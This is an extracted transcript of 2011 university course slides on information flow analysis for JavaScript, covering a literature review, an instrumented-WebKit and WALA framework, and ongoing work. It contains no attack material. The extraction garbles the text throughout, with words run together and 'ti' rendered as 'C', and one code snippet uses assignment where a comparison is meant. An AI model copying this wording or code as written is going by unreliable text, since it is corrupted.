Post on 01-Apr-2018
transcript
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
ClicktoeditMasterCtlestyle
JavaScriptInformaConFlowAnalysis
ShiyiWeiCS6204termproject
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
ClicktoeditMasterCtlestyle
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
ProjectmoCvaCon Literaturereview
PaperorgnizaCon Selectedpapers ObservaCons
Frameworkoverview
Analysiscomponents
On‐goingwork&conclusion
2
Overview
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
ClicktoeditMasterCtlestyle
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience 3
ProjectMoCvaCon
Jif:JavainformaConflow Type‐basedapproach
• Languageextension• Imprecise
Javaprogramminglanguage• StaCctyping• Classhierarchy
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
ClicktoeditMasterCtlestyle
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
InformaConflowanalysisforJavaScript Type‐basedapproachworks?
• Dynamictyping
Challenges• Dynamiclanguagefeatures
– Prototyping– DynamiccodegeneraCon
– VariadicfuncCons– Fields
• Benchmark
4
ProjectMoCvaCon
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
ClicktoeditMasterCtlestyle
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
Papercategories InformaConflowanalysisforC,C++,andJava
Analyzingdynamiclanguages• Performance
• Correctness SecurityanalysisofJavaScript
• StaCcanalysis• Dynamicanalysis
5
LiteratureReview
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
ClicktoeditMasterCtlestyle
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
GATEKEEPER[1] JavaScriptwidget JavaScriptSAFE
• StaCc JavaScriptGK
• Dynamic
6
LiteratureReview
References[1]S.Guarnieri,andB.Livshits.GATEKEEPER:mostlystaCcenforcementofsecurityandreliabilitypoliciesfor JavaScript code. In proceedings of the 18thconference on USENIX security symposium(2009),pp.151‐168
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
ClicktoeditMasterCtlestyle
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
StagedinformaConflowforJavaScript[2] Integritypolicy
• Thecodeloadedatanyevalsitemustnotintothevalueofdocument.loca.on
ConfidenCalpolicy• Thevalueofdocument.cookiemustnotflowintoanyvariablewithinthecodeloadedatanyevalsite
StagedinformaConflow• Stage1:Computepolicy
• Stage2:Checkpolicy
7
LiteratureReview
References[2] R. Chugh, J. A. Meister, R. Jhala, and S. Lerner.Staged informaCon flow for JavaScript. Inproceedings of the 2009 ACM SIGPLAN conferenceo n P r o g r amm i n g L a n g u a ge D e s i g n a n dImplementaCon
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
ClicktoeditMasterCtlestyle
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
JavaScripttaintanalysis[3] Prototypes
ObjectcreaCons
ReflecCvepropertyaccesses Lexicalscoping
8
LiteratureReview
References[3] S. Guarnieri, M. Pistoia, O. Tripp, J. Dolby, S.Teilhet, R. Berg. Saving the world wide web fromvulnerable JavaScript. In proceedings of the 2011InternaConal Symposium on Soiware TesCng andAnalysis.
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
ClicktoeditMasterCtlestyle
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
ObservaCons Handlelimitedlanguagefeatures
• Prototype[2,4]• ProperCesdeleCon• eval
Experimentaldesign• JavaScriptbenchmarknotrepresentaCve[5]
9
LiteratureReview
References[4] A. Guha, S. Krishnamurthi, and T. Jim. Using staCc analysis for ajaxintrusion detecCon. In InternaCon Conference on World WideWorld(WWW),2009[5]G. Richards, S. Lebresne, B. Burg, J. Vitek. An analysis of the dynamicbehaviorofJavaScriptprograms.Inproceedingsofthe2010ACMSIGPLANconferenceonProgrammingLanguageDesignandImplementaCon.
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
ClicktoeditMasterCtlestyle
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience 10
FrameworkOverview
InstrumentedWebKit
Callgraph+dynamicallygeneratedcode
Websitesource
StaCcanalysisInfrastructure
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
ClicktoeditMasterCtlestyle
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
InstrumentedWebKit TracingSafari[5] Instrumentedcode
• FuncConcalls– Methodsignature– Arguments
• ObjectcreaConsites• Dynamicallygeneratedcode
– Eval– document.write
– etc.
11
AnalysisComponents
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
ClicktoeditMasterCtlestyle
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
StaCcInfrastructure WALA
• IBMT.J.WatsonLibrariesforAnalysis
ExtractJavaScriptcode• Fromwebsitesource
ImportdynamicinformaCon• Dynamiccallgraph
• Dynamicallygeneratedcode
12
AnalysisComponents
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
ClicktoeditMasterCtlestyle
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
StaCcinfrastructure HandleJavaScriptlanguagefeatures
• VariadicfuncCons– MethoddefiniCons+arguments– Pruningwithargument.length– twiker.com,amazon.com,msn.com,…
• DynamiccodegeneraCon
13
AnalysisComponents
1.funcConF(a,b)2.{3.if(arguments.length=1)4.{…}5.elseif(arguments.length=2)6.{…}7.elseif(arguments.length>=3)8.{…}9.}
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
ClicktoeditMasterCtlestyle
Fall,2011‐Privacy&Security‐VirginiaTech–ComputerScience
On‐goingwork InformaConflowalgorithm Benchmark Handleotherlanguagefeatures
• Prototyping,etc Conclusion
Literaturereview• JavaScriptInformaConflowishard
– Dynamiclanguagefeatures
Blendedapproach• Worksonunsolvedissues
14
On‐goingWork&Conclusion